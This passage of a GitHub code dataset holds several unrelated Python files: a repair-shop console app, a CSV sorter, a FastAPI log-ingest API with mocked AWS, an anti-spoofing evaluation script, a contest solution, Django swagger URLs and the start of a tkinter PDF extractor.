Игоревич')\nadmin2 = Admin('seganik4', '654321R', 'Валерий Иванович')\nadmin3 = Admin('bugimen', '13579P', 'Галина Николаевна')\n\nclients1 = Telephone(Receipt.count, 'телефон', 'samsung', 'андроид', 'разбит экран', '12.02.2022',\n '17.02.2022', 'Андрей Белов', 'ремонт')\nclients2 = Tv(Receipt.count, 'телевизор', 'LG', '52 дюйма', 'не включается', '12.02.2022', '17.02.2022',\n 'Иван Усович', 'готово')\nclients3 = Laptop(Receipt.count, 'ноутбук', 'acer', 'windows', '2019 год выпуска', 'не включается',\n '12.02.2022', '17.02.2022', 'Гарик Харламов', 'ремонт')\nclients4 = Telephone(Receipt.count, 'телефон', 'xiaomi', 'андроид', 'не заряжается', '12.02.2022',\n '17.02.2022', 'Павел Воля', 'ремонт')\nclients5 = Telephone(Receipt.count, 'телефон', 'apple', 'ios', 'зависает', '12.02.2022', '17.02.2022',\n 'Михаил Галустян', 'ремонт')\nclients6 = Telephone(Receipt.count, 'телефон', 'xiaomi', 'андроид', 'не включается', '15.02.2022', '18.02.2022',\n 'Михаил Галустян', 'готов')\n\nwhile True:\n step1 = input(\"Выберете действие:\\n\"\n \"1-Сдать в ремонт\\n\"\n \"2-Постмотреть информацию\\n\"\n \"3-Зайти в панель администратора\\n\")\n if step1 == '1':\n Receipt.clients_new()\n\n elif step1 == '2':\n Receipt.receipt_info()\n\n elif step1 == '3':\n Admin.admin_action()\n\n with open(\"file.txt\", \"w\") as file:\n json.dump(clients, file)\n with open(\"file.txt\", \"r\") as file:\n f = json.load(file)\n for i in f:\n print(i)\n","repo_name":"siarhei-nik/Project1","sub_path":"project ООП.py","file_name":"project ООП.py","file_ext":"py","file_size_in_byte":11579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6411977525","text":"import pandas as pd\n\ndef sort_csv_by_activity_date_and_activity_time(raw_csv, destFilename):\n\n data = pd.read_csv(raw_csv)[['square_id','activity_date', 'cluster', 'activity_time', 'energy']]\n data.sort_values(by=['activity_date','square_id','activity_time'], ascending=True, inplace=True)\n data.to_csv(destFilename, index=False)\n\n# tem que rodar duas vezes, uma para descobri dados que não significam nada no final a partir dos dados originais\n# e outra vez vez a partir dos dados limpos para organizar corretamente\n# sort_csv_by_activity_date_and_activity_time(\"C:\\\\Users\\\\ggpsg\\\\Downloads\\\\Dados\\\\full-activity-anomalies_minutes-nov1dec22-raw.csv\",\n# \"dados\\\\milan-sorted.csv\")\n\nsort_csv_by_activity_date_and_activity_time(\"dados\\milan-sorted.csv\", \"dados\\\\milan-sorted.csv\")\n\nprint(pd.read_csv(\"dados\\\\milan-sorted.csv\").head())\n","repo_name":"ggpsgeorge/Milan-Cluster","sub_path":"csv-sorting.py","file_name":"csv-sorting.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"11249668237","text":"from fastapi import FastAPI, File, UploadFile\r\nfrom fastapi.responses import JSONResponse\r\nfrom typing import List, Any\r\nimport json\r\nimport boto3 #not used as we have AWS comms commented out\r\n\r\napp = FastAPI()\r\n\r\nclass AWSIngestError(Exception):\r\n def __init__(self, message):\r\n super().__init__(message)\r\n\r\n@app.post(\"/ingestLogs/\")\r\nasync def upload_files(files: List[UploadFile], clientID: str):\r\n \"\"\"\r\n Upload and process files in JSON or TXT format.\r\n\r\n This endpoint accepts a list of uploaded files, processes them based on their\r\n file type (JSON or TXT), and returns the processed data.\r\n\r\n Args:\r\n files (List[UploadFile]): A list of uploaded 
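# The csv-sorting record above (its Portuguese comment says: run it twice,
# once on the raw data to spot meaningless rows, then again on the cleaned
# data to order it correctly) is a read -> sort_values -> to_csv roundtrip.
# The same pattern as a self-contained miniature, with an in-memory frame in
# place of the Milan files:
import pandas as pd

df = pd.DataFrame({'square_id': [2, 1, 1],
                   'activity_date': ['2013-11-01'] * 3,
                   'activity_time': ['10:20', '10:10', '10:00'],
                   'energy': [0.3, 0.2, 0.1]})
df.sort_values(by=['activity_date', 'square_id', 'activity_time'],
               ascending=True, inplace=True)
print(df.to_csv(index=False))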
files to process.\r\n clientID: would be passed later via the bearer token and we can resolve the client jwt.io\r\n\r\n Returns:\r\n Dict[str, Union[str, List[Dict[str, Union[str, Any]]]]]: A dictionary containing\r\n information about the processed files. The structure is as follows:\r\n {\r\n \"files\": [\r\n {\r\n \"file_name\": str,\r\n \"file_type\": str (either 'json' or 'txt')\r\n },\r\n ...\r\n ]\r\n }\r\n\r\n Raises:\r\n JSONResponse: If there is an error in the uploaded files, such as invalid\r\n JSON format or an unsupported file format, an appropriate error response is returned.\r\n \"\"\"\r\n\r\n # VERIFY THE BEARER TOKEN\r\n # METER THE REQUEST FOR COST/USAGE TRACKING\r\n\r\n results = []\r\n clientConfig = getClientConfig(clientID)\r\n\r\n for file in files:\r\n if file.filename.endswith('.json'):\r\n # Handle JSON files\r\n try:\r\n content = await file.read()\r\n data = json.loads(content.decode('utf-8'))\r\n try:\r\n stage_in_s3_and_queue(data, file.filename, clientConfig)\r\n results.append({\"file_name\": file.filename, \"file_type\": \"json\"})\r\n except:\r\n raise AWSIngestError(\"Ingestion Error\")\r\n except json.JSONDecodeError as e:\r\n return JSONResponse(content={\"error\": \"Invalid JSON format\"}, status_code=400)\r\n except AWSIngestError as e:\r\n # Something went wrong writing to AWS - may want to keep going in the future and just provide a digest of failures\r\n print(f\"An error occurred: {e}\")\r\n return({\r\n \"status\": \"An Error Occured\",\r\n \"clientConfig\": clientConfig,\r\n \"failedFile\": file.filename\r\n })\r\n\r\n elif file.filename.endswith('.txt'):\r\n # Handle TXT files\r\n try:\r\n content = await file.read()\r\n text_data = content.decode('utf-8')\r\n try:\r\n stage_in_s3_and_queue(text_data, file.filename, clientConfig)\r\n results.append({\"file_name\": file.filename, \"file_type\": \"txt\"})\r\n except:\r\n raise AWSIngestError(\"Ingestion Error\")\r\n except Exception as e:\r\n return JSONResponse(content={\"error\": \"Error reading TXT file\"}, status_code=400)\r\n\r\n else:\r\n return JSONResponse(content={\"error\": \"Unsupported file format\"}, status_code=400)\r\n \r\n #TODO: build out response in standard format\r\n return ({\r\n \"status\" : \"success\",\r\n \"files\": results\r\n }) \r\n\r\nif __name__ == \"__main__\":\r\n import uvicorn\r\n uvicorn.run(app, host=\"0.0.0.0\", port=8002)\r\n\r\ndef stage_in_s3_and_queue(file_bytes, filename, clientConfig):\r\n '''\r\n Leaving commented out the actual interaction with AWS as we don't have any real infrastructure\r\n and mocking this to allow the API for ingestion to function.\r\n\r\n This can be purposely failed by sending empty input values so you can raise the custom error\r\n '''\r\n # Initialize AWS S3 and SQS clients\r\n #s3_client = boto3.client('s3')\r\n #sqs_client = boto3.client('sqs')\r\n\r\n try:\r\n # Verify input params\r\n if any(arg is None for arg in (file_bytes, filename, clientConfig)):\r\n raise TypeError\r\n \r\n # Upload the bytes to S3\r\n #s3_client.put_object(Bucket=bucket_name, Key=object_key, Body=file_bytes)\r\n\r\n\r\n # Construct the S3 URL of the uploaded file\r\n s3_url = f\"https://{clientConfig['clientS3Bucket']}.s3.amazonaws.com/stage/{filename}\"\r\n \r\n # Place the S3 URL in SQS\r\n #response = sqs_client.send_message(\r\n # QueueUrl=clientConfig[\"clientSQSQueue\"],\r\n # MessageBody={\r\n # \"s3Url\": s3_url,\r\n # \"clientConfig\": clientConfig\r\n # }\r\n #)\r\n\r\n # Print a success message\r\n print(f\"File uploaded to S3: 
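# A hedged usage sketch for the /ingestLogs/ endpoint above. It assumes the
# uvicorn defaults from this same file (port 8002) and a made-up clientID;
# FastAPI reads `clientID: str` as a query parameter and `files` as repeated
# multipart fields:
import requests

payload = [('files', ('app.log.txt', b'line one\nline two', 'text/plain'))]
resp = requests.post('http://localhost:8002/ingestLogs/',
                     params={'clientID': 'acme'}, files=payload)
print(resp.status_code, resp.json())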
{s3_url}\")\r\n #print(f\"Message sent to SQS with MessageId: {response['MessageId']}\")\r\n print(f\"Message sent to SQS with MessageId: ak3ka0402k214s\")\r\n\r\n except Exception as e:\r\n print(f\"Error uploading file to S3 or sending SQS message: {str(e)}\")\r\n except TypeError as e:\r\n print(f\"Mising Input Variables\")\r\n\r\ndef getClientConfig(clientID: str):\r\n '''\r\n Fully mocked - allows us to raise the complexity of how/where we store data and name things\r\n without needing to really tinker with how this all works.\r\n\r\n Plan: Move this data to DynamoDB and make this function a query to that datatable\r\n '''\r\n return({\r\n \"clientID\" : clientID,\r\n \"clientIndexPattern\": clientID + '_09192023', #date based index, likely want to encode even the clientid for more security\r\n \"clientRSTable\": clientID + '_table', #assumes single cluster many tables\r\n \"clientS3Bucket\": clientID + '_3k30ak3K3k60', #random guid would be added for global names - each environment would be distinct\r\n \"clientSQSQueue\": clientID + \"_sqs\"\r\n })\r\n","repo_name":"kjeckell/helloWorld_backend","sub_path":"B-CodeTask/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29240657144","text":"#from core.Evaluate import Evaluate\n# from core.Evaluate_transformer import Evaluate\n#from core.Evaluate_MTL_EfficientNet import Evaluate\nfrom core.Evaluate_MTL_EfficientNet_full import Evaluate\n\n\nimport argparse\nimport os\nimport json\nfrom shutil import copyfile\nimport matplotlib\n#matplotlib.use('Agg')\n#import matplotlib.pyplot as plt\n\nparser = argparse.ArgumentParser(description='STTN')\nparser.add_argument('-c', '--config', default='configs/SiW.json', type=str)\n\nargs = parser.parse_args()\n\n\n\n\ndef main_worker(config):\n config_path = os.path.join(\n config['save_dir'], config['config'].split('/')[-1])\n if not os.path.isfile(config_path):\n copyfile(config['config'], config_path)\n\n os.environ['CUDA_VISIBLE_DEVICES'] = config['test']['gpu']\n\n dataset = os.path.basename(args.config).split('.')[0]\n config['dataset'] = dataset\n\n ACC_all_val = []\n APCER_all_val= []\n BPCER_all_val = []\n ACER_all_val = []\n\n\n ACC_enc_all_val = []\n APCER_enc_all_val= []\n BPCER_enc_all_val = []\n ACER_enc_all_val = []\n\n\n ACC_dec_all_val = []\n APCER_dec_all_val = []\n BPCER_dec_all_val = []\n ACER_dec_all_val = []\n\n\n ACC_all = []\n APCER_all= []\n BPCER_all = []\n ACER_all = []\n threshold_all=[]\n\n ACC_enc_all = []\n APCER_enc_all= []\n BPCER_enc_all = []\n ACER_enc_all = []\n threshold_all_enc_cls = []\n\n ACC_dec_all = []\n APCER_dec_all= []\n BPCER_dec_all = []\n ACER_dec_all = []\n threshold_all_depth_cls = []\n\n ACC_vote_all = []\n APCER_vote_all= []\n BPCER_vote_all = []\n ACER_vote_all = []\n\n save_dir =config['save_dir']\n model_dir = config['test']['ckpt']\n [first_model, last_model]= config['test']['test_model']\n evaluate = Evaluate(config, 'test')\n\n if first_model == last_model:\n last_model = first_model +1\n for i in range(first_model,last_model+1, config['test']['test_model_sample_interval']):\n trained_model = model_dir+\"gen_%05d\"%i+\".pth\"\n ep = i\n config['test']['ckpt'] = trained_model\n # save_dir_i = os.path.join(save_dir, \"%04d\"%i)\n # if not os.path.isdir(save_dir_i):\n # os.mkdir(save_dir_i)\n # config['save_dir'] = save_dir_i\n\n # ACC, APCER, BPCER, ACER, threshold, fprs, tprs, thresholds, acc_list, 
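# Two review notes on the record above. First, in stage_in_s3_and_queue the
# `except TypeError` placed after `except Exception` is unreachable, because
# TypeError subclasses Exception; the narrower handler must come first.
# Second, getClientConfig documents a plan to move the config data to
# DynamoDB; a sketch of that plan under stated assumptions (the table name
# 'client_configs' and key attribute 'clientID' are made up):
import boto3

def get_client_config(client_id: str) -> dict:
    table = boto3.resource('dynamodb').Table('client_configs')
    item = table.get_item(Key={'clientID': client_id}).get('Item')
    if item is None:
        raise KeyError(f'no config stored for client {client_id}')
    return item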
thresholds_test, \\\n # ACC_cls_enc, APCER_cls_enc, BPCER_cls_enc, ACER_cls_enc, \\\n # ACC_cls_dec, APCER_cls_dec, BPCER_cls_dec, ACER_cls_dec,\\\n # ACC_vote, APCER_vote, BPCER_vote, ACER_vote= evaluate.evaluate(ep, config['test']['ckpt'])\n\n threshold, ACC_val, APCER_val, BPCER_val, ACER_val, APCERs_val, BPCERs_val, \\\n threshold_enc_cls, ACC_val_enc_cls, APCER_val_enc_cls, BPCER_val_enc_cls, ACER_val_enc_cls, APCERs_val_enc_cls, BPCERs_val_enc_cls, \\\n threshold_depth_cls, ACC_val_depth_cls, APCER_val_depth_cls, BPCER_val_depth_cls, ACER_val_depth_cls, APCERs_val_depth_cls, BPCERs_val_depth_cls, \\\n ACC, APCER, BPCER, ACER, \\\n ACC_cls_enc, APCER_cls_enc, BPCER_cls_enc, ACER_cls_enc, \\\n ACC_cls_dec, APCER_cls_dec, BPCER_cls_dec, ACER_cls_dec, \\\n ACC_vote, APCER_vote, BPCER_vote, ACER_vote = evaluate.evaluate(ep, config['test']['ckpt'])\n\n ACC_all_val.append(ACC_val)\n APCER_all_val.append(APCER_val)\n BPCER_all_val.append(BPCER_val)\n ACER_all_val.append(ACER_val)\n\n\n ACC_enc_all_val.append(ACC_val_enc_cls)\n APCER_enc_all_val.append(APCER_val_enc_cls)\n BPCER_enc_all_val.append(BPCER_val_enc_cls)\n ACER_enc_all_val.append(ACER_val_enc_cls)\n\n ACC_dec_all_val.append(ACC_val_depth_cls)\n APCER_dec_all_val.append(APCER_val_depth_cls)\n BPCER_dec_all_val.append(BPCER_val_depth_cls)\n ACER_dec_all_val.append(ACER_val_depth_cls)\n\n\n ACC_all.append(ACC)\n APCER_all.append(APCER)\n BPCER_all.append(BPCER)\n ACER_all.append(ACER)\n threshold_all.append(threshold)\n\n ACC_enc_all.append(ACC_cls_enc)\n APCER_enc_all.append(APCER_cls_enc)\n BPCER_enc_all.append(BPCER_cls_enc)\n ACER_enc_all.append(ACER_cls_enc)\n threshold_all_enc_cls.append(threshold_enc_cls)\n\n ACC_dec_all.append(ACC_cls_dec)\n APCER_dec_all.append(APCER_cls_dec)\n BPCER_dec_all.append(BPCER_cls_dec)\n ACER_dec_all.append(ACER_cls_dec)\n threshold_all_depth_cls.append(threshold_depth_cls)\n\n ACC_vote_all.append(ACC_vote)\n APCER_vote_all.append(APCER_vote)\n BPCER_vote_all.append(BPCER_vote)\n ACER_vote_all.append(ACER_vote)\n\n print(\"\"\"threshold= %.4f, ACC= %.4f, APCER= %.4f, BPCER= %.4f, ACER= %.4f\\n\n ACC_enc= %.4f, APCER_enc= %.4f, BPCER_enc= %.4f, ACER_enc= %.4f\\n\n ACC_dec= %.4f, APCER_dec= %.4f, BPCER_dec= %.4f, ACER_dec= %.4f\\n\n ACC_vote= %.4f, APCER_vote= %.4f, BPCER_vote= %.4f, ACER_vote= %.4f\\n\"\"\" % (\n threshold, ACC, APCER, BPCER, ACER, \\\n ACC_cls_enc, APCER_cls_enc, BPCER_cls_enc, ACER_cls_enc, \\\n ACC_cls_dec, APCER_cls_dec, BPCER_cls_dec, ACER_cls_dec, \\\n ACC_vote, APCER_vote, BPCER_vote, ACER_vote))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'log.txt'), 'w') as f:\n f.write(\"\"\"threshold= %.4f, ACC= %.4f, APCER= %.4f, BPCER= %.4f, ACER= %.4f\\n \n threshold_enc_cls= %.4f, ACC_enc= %.4f, APCER_enc= %.4f, BPCER_enc= %.4f, ACER_enc= %.4f\\n \n threshold_dec_cls= %.4f, ACC_dec= %.4f, APCER_dec= %.4f, BPCER_dec= %.4f, ACER_dec= %.4f\\n\n ACC_vote= %.4f, APCER_vote= %.4f, BPCER_vote= %.4f, ACER_vote= %.4f\\n\"\"\" % (\n threshold, ACC, APCER, BPCER, ACER, \\\n threshold_enc_cls, ACC_cls_enc, APCER_cls_enc, BPCER_cls_enc, ACER_cls_enc, \\\n threshold_depth_cls, ACC_cls_dec, APCER_cls_dec, BPCER_cls_dec, ACER_cls_dec, \\\n ACC_vote, APCER_vote, BPCER_vote, ACER_vote))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'APCERs_val.txt'), 'w') as f:\n f.write('APCERs_val\\n')\n for i, apcer in enumerate(APCERs_val):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'BPCERs_val.txt'), 'w') as f:\n f.write('BPCERs_val\\n')\n 
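# The metric dumps in this evaluation script repeat one shape many times:
# open a .txt file, write a header line, then one '%f' per value. A refactor
# sketch (hypothetical helper, not in the original evaluate_mtl.py) that each
# of the per-metric blocks below could call instead:
import os

def write_metric_column(save_dir, name, values):
    """Write '<name>.txt' as a header line followed by one float per line."""
    with open(os.path.join(save_dir, name + '.txt'), 'w') as f:
        f.write(name + '\n')
        for value in values:
            f.write('%f\n' % value)

# e.g. write_metric_column(save_dir, 'ACER_all', ACER_all)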
for i, bpcer in enumerate(BPCERs_val):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'APCERs_val_enc_cls.txt'), 'w') as f:\n f.write('APCERs_val_enc_cls\\n')\n for i, apcer in enumerate(APCERs_val_enc_cls):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'BPCERs_val_enc_cls.txt'), 'w') as f:\n f.write('BPCERs_val_enc_cls\\n')\n for i, bpcer in enumerate(BPCERs_val_enc_cls):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'APCERs_val_depth_cls.txt'), 'w') as f:\n f.write('APCERs_val_depth_cls\\n')\n for i, apcer in enumerate(APCERs_val_depth_cls):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'BPCERs_val_depth_cls.txt'), 'w') as f:\n f.write('BPCERs_val_depth_cls\\n')\n for i, bpcer in enumerate(BPCERs_val_depth_cls):\n f.write('%f\\n' % (bpcer))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'val_fpr.txt'), 'w') as f:\n # f.write('fps\\n')\n # for i, fpr in enumerate(fprs):\n # f.write('%f\\n' %(fpr))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'val_tpr.txt'), 'w') as f:\n # f.write('tprs\\n')\n # for i, fpr in enumerate(fprs):\n # f.write('%f\\n' %(tprs[i]))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'val_threholds.txt'), 'w') as f:\n # f.write('thresholds\\n')\n # for i, fpr in enumerate(fprs):\n # f.write('%f\\n' %(thresholds[i]))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'acc_test.txt'), 'w') as f:\n # f.write('acc\\n')\n # for i, acc in enumerate(acc_list):\n # f.write('%f\\n' %(acc))\n # with open(os.path.join(config['save_dir'], 'ep_%03d'%ep, 'threholds_test.txt'), 'w') as f:\n # f.write('thresholds_test\\n')\n # for i, acc in enumerate(acc_list):\n # f.write('%f\\n' %(thresholds_test[i]))\n\n ## PAD by thresholding the estimated depth map\n with open(os.path.join(save_dir, 'ACC_all_val.txt'), 'w') as f:\n f.write('ACC_all_val\\n')\n for i, acc in enumerate(ACC_all_val):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_all_val.txt'), 'w') as f:\n f.write('APCER_all_val\\n')\n for i, apcer in enumerate(APCER_all_val):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_all_val.txt'), 'w') as f:\n f.write('BPCER_all_val\\n')\n for i, bpcer in enumerate(BPCER_all_val):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_all_val.txt'), 'w') as f:\n f.write('ACER_all_val\\n')\n for i, acer in enumerate(ACER_all_val):\n f.write('%f\\n' % (acer))\n\n\n ## classification by the encoder/transformer\n with open(os.path.join(save_dir, 'ACC_enc_all.txt'), 'w') as f:\n f.write('ACC_enc_all\\n')\n for i, acc in enumerate(ACC_enc_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_enc_all.txt'), 'w') as f:\n f.write('APCER_enc_all\\n')\n for i, apcer in enumerate(APCER_enc_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_enc_all.txt'), 'w') as f:\n f.write('BPCER_enc_all\\n')\n for i, bpcer in enumerate(BPCER_enc_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_enc_all.txt'), 'w') as f:\n f.write('ACER_enc_all\\n')\n for i, acer in enumerate(ACER_enc_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all_enc_cls.txt'), 'w') as f:\n f.write('threshold_all_enc_cls\\n')\n for i, threshold in enumerate(threshold_all_enc_cls):\n f.write('%f\\n' % (threshold))\n\n ## classification based on the estimated depth 
map\n with open(os.path.join(save_dir, 'ACC_dec_all.txt'), 'w') as f:\n f.write('ACC_dec_all\\n')\n for i, acc in enumerate(ACC_dec_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_dec_all.txt'), 'w') as f:\n f.write('APCER_dec_all\\n')\n for i, apcer in enumerate(APCER_dec_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_dec_all.txt'), 'w') as f:\n f.write('BPCER_dec_all\\n')\n for i, bpcer in enumerate(BPCER_dec_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_dec_all.txt'), 'w') as f:\n f.write('ACER_dec_all\\n')\n for i, acer in enumerate(ACER_dec_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all_depth_cls.txt'), 'w') as f:\n f.write('threshold_all_depth_cls\\n')\n for i, threshold in enumerate(threshold_all_depth_cls):\n f.write('%f\\n' % (threshold))\n\n with open(os.path.join(save_dir, 'ACC_all.txt'), 'w') as f:\n f.write('ACC_all\\n')\n for i, acc in enumerate(ACC_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_all.txt'), 'w') as f:\n f.write('APCER_all\\n')\n for i, apcer in enumerate(APCER_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_all.txt'), 'w') as f:\n f.write('BPCER_all\\n')\n for i, bpcer in enumerate(BPCER_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_all.txt'), 'w') as f:\n f.write('ACER_all\\n')\n for i, acer in enumerate(ACER_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all.txt'), 'w') as f:\n f.write('threshold_all\\n')\n for i, threshold in enumerate(threshold_all):\n f.write('%f\\n' % (threshold))\n\n ## classification by the encoder/transformer\n with open(os.path.join(save_dir, 'ACC_enc_all.txt'), 'w') as f:\n f.write('ACC_enc_all\\n')\n for i, acc in enumerate(ACC_enc_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_enc_all.txt'), 'w') as f:\n f.write('APCER_enc_all\\n')\n for i, apcer in enumerate(APCER_enc_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_enc_all.txt'), 'w') as f:\n f.write('BPCER_enc_all\\n')\n for i, bpcer in enumerate(BPCER_enc_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_enc_all.txt'), 'w') as f:\n f.write('ACER_enc_all\\n')\n for i, acer in enumerate(ACER_enc_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all_enc_cls.txt'), 'w') as f:\n f.write('threshold_all_enc_cls\\n')\n for i, threshold in enumerate(threshold_all_enc_cls):\n f.write('%f\\n' % (threshold))\n\n ## classification based on the estimated depth map\n with open(os.path.join(save_dir, 'ACC_dec_all.txt'), 'w') as f:\n f.write('ACC_dec_all\\n')\n for i, acc in enumerate(ACC_dec_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_dec_all.txt'), 'w') as f:\n f.write('APCER_dec_all\\n')\n for i, apcer in enumerate(APCER_dec_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_dec_all.txt'), 'w') as f:\n f.write('BPCER_dec_all\\n')\n for i, bpcer in enumerate(BPCER_dec_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_dec_all.txt'), 'w') as f:\n f.write('ACER_dec_all\\n')\n for i, acer in enumerate(ACER_dec_all):\n f.write('%f\\n' % (acer))\n with open(os.path.join(save_dir, 'threshold_all_depth_cls.txt'), 'w') as f:\n f.write('threshold_all_depth_cls\\n')\n for i, threshold in enumerate(threshold_all_depth_cls):\n f.write('%f\\n' % (threshold))\n\n ## 
classification based on the vote results\n with open(os.path.join(save_dir, 'ACC_vote_all.txt'), 'w') as f:\n f.write('ACC_vote_all\\n')\n for i, acc in enumerate(ACC_vote_all):\n f.write('%f\\n' % (acc))\n with open(os.path.join(save_dir, 'APCER_vote_all.txt'), 'w') as f:\n f.write('APCER_vote_all\\n')\n for i, apcer in enumerate(APCER_vote_all):\n f.write('%f\\n' % (apcer))\n with open(os.path.join(save_dir, 'BPCER_vote_all.txt'), 'w') as f:\n f.write('BPCER_vote_all\\n')\n for i, bpcer in enumerate(BPCER_vote_all):\n f.write('%f\\n' % (bpcer))\n with open(os.path.join(save_dir, 'ACER_vote_all.txt'), 'w') as f:\n f.write('ACER_vote_all\\n')\n for i, acer in enumerate(ACER_vote_all):\n f.write('%f\\n' % (acer))\n\n\n return\n\nif __name__ == '__main__':\n\n config = json.load(open(args.config))\n config['config'] = args.config\n\n\n main_worker(config)\n","repo_name":"fangwei00-jin/ViTransPAD","sub_path":"evaluate_mtl.py","file_name":"evaluate_mtl.py","file_ext":"py","file_size_in_byte":15375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"26273455333","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\narr = list(map(int, input().split()))\n\nstart = 0\nend = max(arr)\nr = 0\nt = 0\nwhile end - start >= 0:\n mid = (end + start) // 2\n s = 0\n for i in range(n):\n if arr[i] - mid >= 0:\n s += arr[i] - mid\n if s > m:\n start = mid+1\n elif s < m:\n end = mid-1\n # print(mid)\n if r == mid:\n break\n r = mid\nprint(r)","repo_name":"sihyeokpark/Baekjoon","sub_path":"baekjoon/silver/2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"21655978880","text":"\"\"\"Module with urls for swagger documentation.\"\"\"\nfrom django.urls import path\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework.permissions import AllowAny\n\nschema_view = get_schema_view(\n openapi.Info(\n '한국어를 공부 API',\n default_version='1.0',\n contact=openapi.Contact(\n email='rafayt323@gmail.com',\n url='https://t.me/rafailka_m',\n ),\n ),\n public=True,\n permission_classes=(AllowAny,),\n)\n\nurlpatterns = (\n path(\n 'swagger/',\n schema_view.without_ui(),\n name='schema-json',\n ),\n path('swagger/', schema_view.with_ui(), name='schema-swagger-ui'),\n)\n","repo_name":"rafailmdzdv/hangugeoreul-gongbuhaeyo","sub_path":"src/server/apps/swagger/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7254114307","text":"import os\nimport webbrowser\nfrom pathlib import Path\nimport subprocess\nimport tkinter as tk\nfrom tkinter import Button, Toplevel, filedialog, messagebox, Text, INSERT\nfrom extractor.extractor import Extractor\n\n\nclass Application(tk.Frame):\n\n FILEBROWSER_PATH = os.path.join(os.getenv('WINDIR'), 'explorer.exe')\n\n def __init__(self, master):\n super().__init__(master)\n self.pack(padx=10, pady=10)\n self.selected_index = 0\n self.create_widgets()\n self.extractor = Extractor()\n self.result = None\n self.shipments = []\n self.file_scanned = False\n\n def create_widgets(self):\n \"\"\"Creates and grid/pack all tkinter widget\n which will be rendered on screen.\n \"\"\"\n # Scanning frame\n self.frame_presentation = tk.Frame(self, pady=5)\n self.frame_presentation.grid(\n row=0, column=0, columnspan=3, sticky=\"we\")\n\n # 
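# The BOJ 2805 record above binary-searches the saw height but terminates via
# a `r == mid` repeat check and two strict comparisons. The standard invariant
# form of the same search, as a sketch (`trees`/`need` mirror its arr/m):
def max_cut_height(trees, need):
    lo, hi, best = 0, max(trees), 0
    while lo <= hi:
        mid = (lo + hi) // 2
        taken = sum(t - mid for t in trees if t > mid)
        if taken >= need:
            best = mid        # enough wood: try a higher cut
            lo = mid + 1
        else:
            hi = mid - 1      # too little wood: cut lower
    return best

assert max_cut_height([20, 15, 10, 17], 7) == 15  # the problem's sample case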
Presentation label, explaining program\n presentation_label_txt = \"Escáner de archivos PDF \" + \\\n \"de MercadoLibre o TiendaNube, o XLSX (Excel) \" + \\\n \"con formato específico.\"\n self.presentation_label = tk.Label(\n self.frame_presentation,\n text=presentation_label_txt, padx=5, pady=10)\n self.presentation_label.pack()\n\n # Open Excel instructions.\n self.excel_instructions = tk.Button(\n self.frame_presentation, text='Ayuda sobre Excel', padx=15,\n command=self.__open_excel_instructions)\n self.excel_instructions.pack(side=tk.LEFT)\n\n # Scanning frame\n self.frame_0 = tk.Frame(self, pady=5)\n self.frame_0.grid(row=1, column=0, columnspan=3, sticky=\"we\")\n\n # Just a label\n self.entry_file_label = tk.Label(\n self.frame_0, text=\"Elegir archivo\", padx=5, pady=10)\n self.entry_file_label.grid(row=0, column=0, sticky=\"w\")\n\n # Entry for filepath\n self.entry_file = tk.Entry(self.frame_0, width=60)\n 